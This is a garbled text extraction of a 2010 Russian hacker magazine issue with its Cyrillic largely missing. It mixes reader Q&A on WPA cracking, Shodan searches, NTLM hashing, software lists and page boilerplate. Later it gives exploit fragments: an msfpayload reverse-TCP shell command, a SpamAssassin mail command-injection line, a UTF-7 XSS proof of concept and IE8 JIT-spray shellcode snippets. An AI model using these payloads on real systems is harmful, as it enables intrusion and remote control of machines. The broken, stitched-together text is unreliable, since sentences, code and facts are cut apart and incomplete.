(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms

Fakeroute':
traceroute to yyyy (63.199.yy.yyy),
30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 wh243.eop.gov (198.137.241.43)
0.442 ms 0.553 ms 0.42 ms
4 foundation.hq.nasa.gov
(198.116.142.34) 0.442 ms 0.542 ms
0.422 ms
5 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms
,

:).
Q:
,
? , .
A: , ,
.
,
,
-.
VPN,
142
, ,

. , VPN,
, ,

.
WPA-
WPA Cracker (www.wpacracker.
com). 400 , ( 135
),
.
, 17$
WPA
ZIP-.
20 ,
5 . WWW2 SHODAN (www.shodanhq.
com),
(,
Apache).
,
XML ,
. , ,

.
Q:
? :)
A: , www.
malwaredomainlist.com www.malwareurl.
com ,
. : ,
,

( RegMon/FileMon), ,
, .
, .

?
A: PowerShell',
Get-WMIObject Win32_
LogicalDisk. , c:\hostlist.txt,

:
Get-WMIObject Win32_LogicalDisk
-filter DriveType=3?
-computer (Get-Content c:\
hostlist.txt) | Select
SystemName,DeviceID,VolumeName,@
{Name=size(GB);Expression={{0
:N1} -f($_.size/1gb)}},@{Name=
freespace(GB);Expression={{0:
N1} -f($_.freespace/1gb)}} | OutGridView
, .
Q: MySQL SQL Server?
A: -
,
.
, MySQL
SQL Server.
,
Microsoft
Sql Server Migration Assistant for MySQL (bit.
ly/8peZcm).
Q: HD-.
( ), .
:
Q: NTLM-,
. -
A: Python', , ,
A: AVI-Mux GUI (www.

alexander-noe.com/video/amg) , .
:
;
( generate data source);
( Drag'n'Drop') ;
Start,
.

. z
:
import hashlib,binascii
hash = hashlib.new('md4',
"thisismyhashvalue".encode('utf16le')).digest()
print binascii.hexlify(hash)
Q:
(30
, ).

HDD, -
X 05 /136/ 10
>Net
AnalogX LinkExaminer 1.01
Feed Notifier 2.2
Gbridge 2.0
Http File Server 2.2f
mRemote 1.63
PrimeDesktop Beta 1.0
SmartCode VNC Manager 5.5
>Multimedia
AIMP 2.61.560
Camtasia Studio 7.0.0
CDBurnerXP 4.3.0
Faceworx 1.0
Fotosketcher 1.96
Foxit Reader 3.2.1
LEGO Digital Designer 3.0.11
MetatOGGer 3.12
Miro 3.0
SeeMonkey Demo
Tableau Public 5.1
Teemoon Video Matching 1.0.5
Wondershare PPT2Video Free
YoWindow 2.0
>Misc
7 Taskbar Thumbnail Customizer
Agent Ransack 2010
Ant Renamer 2.10.0
BatteryCare 0.9.7.10
CodySafe
Desk Drive 1.8.2
Duplicate Music Files Finder 1.6
ExQueues Shell Queue 0.3.10
Keys Extender r12
Launchy 2.5
LogViewer Pro 1.8.0
Moo0 RightClicker 1.38
TreeSize Free 2.4
Ultimate Windows Tweaker 2.1
UNetbootin 4.29
winPenPack Flash Essential 3.6
>Games
Cheat Engine 5.6
Construct 0.99.62
Hedgewars 0.9.13
Souptoys 1.6.0.8
Engine Development Kit 1.9.1
>>WINDOWS
>>Development
ILMerge
JRE 6u19
Microsoft Application Verifier 4.0
Rad Software Regular Expression
Designer v1.4
SciTE 2.10
SQLite Expert Personal 2.4.12
SQLyog 8.32
Sublime Text 1.3
TreeSize Free 2.4
UltraEdit 16.00
Visual Paradigm for UML 7.2
Community Edition
>>UNIX
>Desktop
Amarok 2.3
Nairo-compmgr 0.3.0
Clementine 0.2
DirSync Pro 1.24
Exaile 0.3.1
FBReader 0.12.9
Gaupol 0.15.1
gLabels 2.2.7
Gnumeric 1.10
KMPlayer 0.11.2
mhWaveEdit 1.4.18
OGMRip 0.13.4
Openbox 3.4.11.1
OpenShot 1.1
Pinta 0.2
RecordStream 0.9.2
Scribus 1.3.6
Simple Movie Catalog 1.3.0
Smb4k 0.10.6
TeXmacs 1.0.7.4
VK_search 0.1.0
>System
Auslogics Disk Defrag 3.1.4
Comodo Time Machine 2.6.1
DLL Archive 1.01
Double Driver 3.0
Driver Magician Lite 3.49
ImDisk Virtual Disk Driver 1.2.8
Open Hardware Monitor 0.1.28
Parted Magic 4.9
PortMapper 1.04
Process Explorer 12.01
Software Informer 1.0.5
VirtualBox 3.1.6
ZeuApp 1.4
>Security
CHScanner 0.9.8.1
Digital Forensics Framework 0.5.0
Eraser 6.0.6
FSF 0.7.3.9
Kon-Boot 1.1
Nmap 5.30BETA1
OWASP CSRFTester 1.0
PenTBox 1.3.2
Plecost 0.2.2-8
Scalp 0.4
SIP Inspector 1.0
StreamArmor v1
Toolza 1.0
VASTO beta
w3af 1.0rc3
WebCastellum 1.8.3
WebRaider 0.2.3.8
Websecurify 0.5
XSSer 0.4
StrongDC++ 2.41
TeamViewer 5.0.8
TightVNC 2.0 Beta 1
WinDump 3.9.5
WinPcap 4.1.1
>Security
ClamAV 0.95.3
Dnswall 0.1.4
Dradis 2.5.1
Dsniff 2.3
Flint
HnTool
Lshell 0.9.10
Ncrack 0.01a
OpenSSL 1.0.0
Passwdqc 1.2.1
Pyscanlogd 0.5
Ratproxy 1.58
Skipfish 1.26b
Sqlmap 0.8
Stunnel 4.32
Surfjack 0.2b
Ubitack
>Net
0MQ 2.0.6
Darkstat 3.0.713
EisKaltDC++ 2.0
elFinder 1.1
Google Chrome 5.0.342.7 Beta
Instantbird 0.1.3
Khal 0.0.1
Miro 3.0.0
Mozilla Firefox 3.6.2
Mpop 1.0.20
Opera 10.51
pyAggr3g470r
Rekonq 0.4.0
Retroshare 0.5.0
Rspamd 0.2.9
rTorrent 0.8.6
Rutorrent 3.0
Sharktorrent 0.2.0.4
Twitim 1.4.2
Uget 1.5.0.3
>Games
SuperTux 0.3.3
>Devel
Android NDK r3
BPython 0.9.6.2
C++ Sockets Library 2.3.9.2
GDB 7.1
GSQL 0.2.2
GTK+ 2.20.0
libimobiledevice 1.0.0
libpng 1.4.1
libtorrent 0.14.9
nwcc 0.8.1
Octave 3.2.4
Parrot 2.2.0
PyInstaller 1.4
PyPy 1.2
Python 2.6.5
Redcar 0.3.4dev
SolarPHP 1.0
Squeak 4.0
Titanium 1.0
ZeroC ICE 3.4
>
Damn Vulnerable App 1.0.6
moth 0.6
Mutillidae 1.3
SecuriBench .91a
VMvicnum 1.4
WebGoat 5.2
WebMaven 1.01
>X-distr
NetBSD 5.0.2
System Rescue CD 1.5.0
>System
Ailurus 10.03.2
ATI Catalyst 10.3
Fio 1.38
Grep 2.6
Install Kernel 0.9.4
Linux From Scratch 6.6
Linux Kernel 2.6.33.1
Mdadm 2.6.9
Mirmon 2.3
NTFS-3G 2010.3.6
nVidia 195.36.15
Synchrorep 1.4.5
Tar 1.23
VirtualBox 3.1.6
Wine 1.1.41
XNeur+gXNeur 0.9.8
Yum 3.2.27
>Server
Apache 2.2.15
BIND 9.7.0
CUPS 1.4.2
DHCP 4.1.1
Freeradius 2.1.8
Lighttpd 1.4.26
Monkeyd 0.9.3
MySQL 5.1.45
NFS-Ganesha 0.99.63
OpenLDAP 2.4.21
OpenSSH 5.4
OpenVPN 2.1.1
Postfix 2.7.0
PowerDNS 3.2
Pure-ftpd 1.0.29
RabbIT 4.5
Samba 3.5
Squid 3.0.STABLE25
Tnftpd 20100324
Vsftpd 2.2.2
VMvicnum 14
Webpentools 0.1
Yummy
05(136) 2010
UNITS
HTTP:// WWW2
WAYBACK MACHINE
web.archive.org
SHODAN
www.shodanhq.com
Google, , ? SHODAN . / ,
.
( , , FTP/
Telnet/SSH-) , - . ,
, Apache, Apache
. : apache
2.2.3 . ,
country, hostname, net, os, port. , ,
ISS, :
Microsoft IIS os:"windows 2000" country:US.

Linux
RECONSTRUCTOR
- ,
, -
, . -,
Goolge . -, Wayback Machine, ,
. ,
, ,
. , ,
Energizer ( MEGANEWS),
Wayback Machine,

.
MOCKINGBIRD
www.reconstructor.org www.gomockingbird.com
WWW2 SUSE Studio (susestudio.
com) SUSE Linux.
Reconstructor
Ubuntu Debian. Linux,
. ,
, , ,
. Linux
, .
144

-, Axure RP
(www.axure.com). ,
, , .
mockingbird,
-. .
.
PNG/PDF .
X 05 /136/ 10

Хакер 2010 05 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2010 05 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

.

JIT Spray IE8

JIT Spray IE8

/ .: (495) 935-7034, : (495) 780-8824

$500, Vista/Windows 7 $2000.

DirectX 10.1 UVD 2.0

IE6, Microsoft MIX Internet Explorer 9.

GIGABYTE TECHNOLOGY ASUS

BATMAN: ARKHAM ASYLUM, FPS

: 3,2 (16200), AMD Phenom II X4 955 BE

: AMD 790GX SB750

SuperPI 1.5 XS 1m(, )

: AMD 790FX SB750

wPrime 2.00 ASUS

: AMD 770 SB710

: AMD 785G SB710

: AMD 790X SB710

: AMD 785G SB710

HD 5730 Intel GMA HD.

ASUS N61Ja . ASUS

SuperPI mod.1.5 XS, 1M: 13,4

Xmas Tree Quattro Wireless

Real Time Web

Push, not pull

LONG-POLLING VS. STREAMING

$_message = Array('text' => ' !, 'author' => ', 'time' =>

DAMN VULNERABLE WEB APP

Damn Vulnerable Linux

pdf, . exe, proxy

Windows NT 5.1; MyIE2)\r\n";

echo fgets($socket, 1024);

msfpayload windows/shell/reverse_tcp LHOST=192.168.146.128,L

HLP-, Microsoft Help Workshop,

DotRange (\x50\x01 = 0x150) 0xCC. , , 0x98,

ROOT APACHE SPAMASSASSIN

char *fmt="%s -bv \"%s\" 2>&1";

rcpt to: root+:"|touch /tmp/foo"

debug(D_RCPT, "calling %s", buf);

$query = 'SELECT data FROM tabl1 where

$query = SELECT data FROM tabl1 where

Nokia, Mozilla, SQLite

Normalization Form D (NFD):

- mozilla.org FireFox IDND

Normalization Form KC (NFKC):

<img alt='I am xxx?rc='http://

* UTF-7 XSS PoC

hardware DEP ASLR IE8

IE8 hardware DEP.

permanent DEP? JIT-,

? 0x35 XOR EAX,

var dict = new Dictionary();

var hex = Number(d).toString(rad);

alert('Try me on 0x' + decimalToH

while (hex.length < l) {

CMP [EDI], 'n'

xor eax, eax

mov eax, fs:[eax]

NEXT: mov edx,

mov eax, [eax]

cmp [edi], 'k' ;

inc edi, inc edi ;

0x3cb89090^ // 359090b83c mov eax, 3c ..

PS> Get-Eventlog Security -Message "failed"